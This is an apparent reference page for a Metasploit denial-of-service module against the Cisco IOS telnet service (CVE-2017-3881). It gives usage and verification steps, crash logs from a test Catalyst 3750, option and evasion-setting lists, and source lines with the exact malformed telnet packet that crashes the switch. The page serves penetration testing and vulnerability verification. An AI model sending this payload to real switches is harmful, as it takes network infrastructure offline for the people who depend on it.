Cisco IOS Telnet Denial of Service - Metasploit
This page contains detailed information about how to use the auxiliary/dos/cisco/ios_telnet_rocem metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Cisco IOS Telnet Denial of Service
Module: auxiliary/dos/cisco/ios_telnet_rocem
Source code: modules/auxiliary/dos/cisco/ios_telnet_rocem.rb
Disclosure date: 2017-03-17
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 23
List of CVEs: CVE-2017-3881
This module triggers a Denial of Service condition in the Cisco IOS telnet service affecting multiple Cisco switches. Tested against Cisco Catalyst 2960 and 3750.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/dos/cisco/ios_telnet_rocem
msf auxiliary(ios_telnet_rocem) > show targets
... a list of targets ...
msf auxiliary(ios_telnet_rocem) > set TARGET target-id
msf auxiliary(ios_telnet_rocem) > show options
... show and set options ...
msf auxiliary(ios_telnet_rocem) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
- Obtain a Cisco switch of any model indicated here that is running vulnerable firmware: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp. Note that the vulnerability spans many years. We tested two firmwares 10 years apart and were able to verify exploitability.
- Enable telnet access and verify that you can reach the switch normally via that mode.
Verification Steps
- Start msfconsole
- Do:
use auxiliary/dos/cisco/ios_telnet_rocem
- Do:
set RHOST 192.168.1.10
- Do:
run
- The switch should restart and display crash information on the console.
Scenarios
Switch#sh ver
*Mar 1 01:28:01.802: %SYS-5-CONFIG_I: Configured from console by console
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(53)SE2, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Wed 21-Apr-10 04:49 by prod_rel_team
Image text-base: 0x01000000, data-base: 0x02C00000
ROM: Bootstrap program is C3750 boot loader
BOOTLDR: C3750 Boot Loader (C3750-HBOOT-M) Version 12.2(44)SE5, RELEASE SOFTWARE (fc1)
Switch uptime is 1 hour, 28 minutes
System returned to ROM by power-on
System image file is "flash:/c3750-ipbasek9-mz.122-53.SE2/c3750-ipbasek9-mz.122-53.SE2.bin"
[...]
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
Processor board ID CAT1017Z2Z2
Last reset from power-on
1 Virtual Ethernet interface
48 FastEthernet interfaces
4 Gigabit Ethernet interfaces
The password-recovery mechanism is enabled.
[...]
Cisco IOS Software, C3750 Software (C3750-IPSERVICESK9-M), Version 12.2(55)SE10, RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Wed 11-Feb-15 11:40 by prod_rel_team
Image text-base: 0x01000000, data-base: 0x02F00000
[...]
Election Complete
Switch 2 booting as Master
Waiting for Port download...Complete
[...]
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
Processor board ID CAT1017Z2Z2
Last reset from power-on
1 Virtual Ethernet interface
48 FastEthernet interfaces
4 Gigabit Ethernet interfaces
The password-recovery mechanism is enabled.
[...]
Switch Ports Model SW Version SW Image
------ ----- ----- ---------- ----------
* 2 52 WS-C3750-48TS 12.2(55)SE10 C3750-IPSERVICESK9-M
[... booted successfully, waiting at a prompt, DoS exploit follows ...]
Switch#
00:37:15 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 400, PC = 41414140
-Traceback= 41414140
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_1
=== Flushing messages (00:37:19 UTC Mon Mar 1 1993) ===
Buffered messages:
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
00:00:50: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 has changed to state DOWN
00:00:50: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
00:00:50: %SYS-5-RESTART: System restarted --
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
00:01:48: %SYS-5-CONFIG_I: Configured from console by console
00:27:53: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:27:54: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
00:28:22: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to down
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:30:01: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to down
00:32:44: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:32:45: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
00:33:13: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
Queued messages:
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
Instruction Access Exception (0x0400)!
SRR0 = 0x41414140 SRR1 = 0x00029230 SRR2 = 0x00648990 SRR3 = 0x00021200
ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x8C000000 DBSR = 0x00000000
CPU Register Context:
Vector = 0x00000400 PC = 0x41414140 MSR = 0x00029230 CR = 0x53000005
LR = 0x41414141 CTR = 0x0004D860 XER = 0xC0000050
R0 = 0x41414141 R1 = 0x02DDEE80 R2 = 0x00000000 R3 = 0x0358907C
R4 = 0x00000001 R5 = 0xFFFFFFFF R6 = 0x0182C1B0 R7 = 0x00000000
R8 = 0x00000001 R9 = 0x0290C84C R10 = 0x00000031 R11 = 0x00000000
R12 = 0x00221C89 R13 = 0x00110000 R14 = 0x00BD7284 R15 = 0x00000000
R16 = 0x00000000 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x00000000
R20 = 0xFFFFFFFF R21 = 0x00000000 R22 = 0x00000000 R23 = 0x02DDF078
R24 = 0x00000000 R25 = 0x00000001 R26 = 0x000003FB R27 = 0x00000024
R28 = 0x41414141 R29 = 0x41414141 R30 = 0x41414141 R31 = 0x41414141
Stack trace:
PC = 0x41414140, SP = 0x02DDEE80
Frame 00: SP = 0x41414141 PC = 0x41414141
Switch uptime is 37 minutes, 22 seconds
[... rebooting ... ]
Switch Ports Model SW Version SW Image
------ ----- ----- ---------- ----------
* 1 52 WS-C3750-48TS 12.2(35)SE5 C3750-IPBASEK9-M
Failed to generate persistent self-signed certificate.
Secure server will use temporary self-signed certificate.
Press RETURN to get started!
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
00:00:31: %SYS-5-CONFIG_I: Configured from memory by console
00:00:31: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 h
Switch>
Switch>as changed to state DOWN
00:00:32: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
00:00:32: %SYS-5-RESTART: System restarted --
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
00:00:33: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:00:34: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
Switch>
Switch>
00:01:04: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
00:01:32: %PLATFORM-1-CRASHED: System previously crashed with the following message:
00:01:32: %PLATFORM-1-CRASHED: Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
00:01:32: %PLATFORM-1-CRASHED: Copyright (c) 1986-2007 by Cisco Systems, Inc.
00:01:32: %PLATFORM-1-CRASHED: Compiled Fri 20-Jul-07 01:58 by nachen
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: Instruction Access Exception (0x0400)!
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: SRR0 = 0x41414140 SRR1 = 0x00029230 SRR2 = 0x00648990 SRR3 = 0x00021200
00:01:32: %PLATFORM-1-CRASHED: ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x8C000000 DBSR = 0x00000000
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: CPU Register Context:
00:01:32: %PLATFORM-1-CRASHED: Vector = 0x00000400 PC = 0x41414140 MSR = 0x00029230 CR = 0x53000005
00:01:32: %PLATFORM-1-CRASHED: LR = 0x41414141 CTR = 0x0004D860 XER = 0xC0000050
00:01:32: %PLATFORM-1-CRASHED: R0 = 0x41414141 R1 = 0x02DDEE80 R2 = 0x00000000 R3 = 0x0358907C
00:01:32: %PLATFORM-1-CRASHED: R4 = 0x00000001 R5 = 0xFFFFFFFF R6 = 0x0182C1B0 R7 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R8 = 0x00000001 R9 = 0x0290C84C R10 = 0x00000031 R11 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R12 = 0x00221C89 R13 = 0x00110000 R14 = 0x00BD7284 R15 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R16 = 0x00000000 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R20 = 0xFFFFFFFF R21 = 0x00000000 R22 = 0x00000000 R23 = 0x02DDF078
00:01:32: %PLATFORM-1-CRASHED: R24 = 0x00000000 R25 = 0x00000001 R26 = 0x000003FB R27 = 0x00000024
00:01:32: %PLATFORM-1-CRASHED: R28 = 0x41414141 R29 = 0x41414141 R30 = 0x41414141 R31 = 0x41414141
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: Stack trace:
00:01:32: %PLATFORM-1-CRASHED: PC = 0x41414140, SP = 0x02DDEE80
00:01:32: %PLATFORM-1-CRASHED: Frame 00: SP = 0x41414141 PC = 0x41414141
00:01:32: %PLATFORM-1-CRASHED:
Go back to menu.
Msfconsole Usage
Here is how the dos/cisco/ios_telnet_rocem auxiliary module looks in the msfconsole:
msf6 > use auxiliary/dos/cisco/ios_telnet_rocem
msf6 auxiliary(dos/cisco/ios_telnet_rocem) > show info
Name: Cisco IOS Telnet Denial of Service
Module: auxiliary/dos/cisco/ios_telnet_rocem
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-03-17
Provided by:
Artem Kondratenko
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 23 yes The target port (TCP)
Description:
This module triggers a Denial of Service condition in the Cisco IOS
telnet service affecting multiple Cisco switches. Tested against
Cisco Catalyst 2960 and 3750.
References:
http://www.securityfocus.com/bid/96960
https://nvd.nist.gov/vuln/detail/CVE-2017-3881
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp
https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution
Module Options
This is a complete list of options available in the dos/cisco/ios_telnet_rocem auxiliary module:
msf6 auxiliary(dos/cisco/ios_telnet_rocem) > show options
Module options (auxiliary/dos/cisco/ios_telnet_rocem):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 23 yes The target port (TCP)
Advanced Options
Here is a complete list of advanced options supported by the dos/cisco/ios_telnet_rocem auxiliary module:
msf6 auxiliary(dos/cisco/ios_telnet_rocem) > show advanced
Module advanced options (auxiliary/dos/cisco/ios_telnet_rocem):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the dos/cisco/ios_telnet_rocem module can do:
msf6 auxiliary(dos/cisco/ios_telnet_rocem) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the dos/cisco/ios_telnet_rocem auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(dos/cisco/ios_telnet_rocem) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Failed to get initial packet from telnet service.
Here is a relevant code snippet related to the "Failed to get initial packet from telnet service." error message:
33: begin
34: connect
35: print_status "Connected to telnet service"
36: packet = sock.read(200)
37: if packet.nil?
38: print_error "Failed to get initial packet from telnet service."
39: else
40: print_status "Got initial packet from telnet service: " + packet.inspect
41: end
42: print_status "Sending Telnet DoS packet"
43: sock.put("\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + Rex::Text.rand_text_alpha(1000) + ":1:\xff\xf0")
Unable to connect to <RHOST>:<RPORT>.
Here is a relevant code snippet related to the "Unable to connect to <RHOST>:<RPORT>." error message:
41: end
42: print_status "Sending Telnet DoS packet"
43: sock.put("\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + Rex::Text.rand_text_alpha(1000) + ":1:\xff\xf0")
44: disconnect
45: rescue ::Rex::ConnectionRefused
46: print_status "Unable to connect to #{rhost}:#{rport}."
47: rescue ::Errno::ECONNRESET
48: print_good "DoS packet successful. #{rhost} not responding."
49: end
50: end
51: end
Go back to menu.
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8615 Merged Pull Request: Import DoS module for Cisco CVE-2017-3881
References
- BID-96960
- CVE-2017-3881
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp
- https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution
See Also
Check also the following modules related to this module:
- auxiliary/dos/cisco/ios_http_percentpercent
- auxiliary/dos/cisco/cisco_7937g_dos
- auxiliary/dos/cisco/cisco_7937g_dos_reboot
- post/apple_ios/gather/ios_image_gather
- post/apple_ios/gather/ios_text_gather
- auxiliary/admin/netbios/netbios_spoof
- auxiliary/dos/apple_ios/webkit_backdrop_filter_blur
- auxiliary/gather/fortios_vpnssl_traversal_creds_leak
- auxiliary/scanner/http/cisco_ios_auth_bypass
- auxiliary/scanner/http/nagios_xi_scanner
- auxiliary/scanner/netbios/nbname
- auxiliary/server/netbios_spoof_nat
- auxiliary/spoof/cisco/cdp
- auxiliary/spoof/cisco/dtp
- auxiliary/scanner/telnet/brocade_enable_login
- auxiliary/scanner/telnet/lantronix_telnet_password
- auxiliary/scanner/telnet/lantronix_telnet_version
- auxiliary/scanner/telnet/satel_cmd_exec
- auxiliary/scanner/telnet/telnet_encrypt_overflow
- auxiliary/scanner/telnet/telnet_login
- auxiliary/scanner/telnet/telnet_ruggedcom
- auxiliary/scanner/telnet/telnet_version
- exploit/freebsd/telnet/telnet_encrypt_keyid
- exploit/linux/telnet/netgear_telnetenable
- exploit/linux/telnet/telnet_encrypt_keyid
- exploit/solaris/telnet/fuser
- exploit/solaris/telnet/ttyprompt
- exploit/windows/telnet/gamsoft_telsrv_username
- exploit/windows/telnet/goodtech_telnet
- auxiliary/server/capture/telnet
Authors
- Artem Kondratenko
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.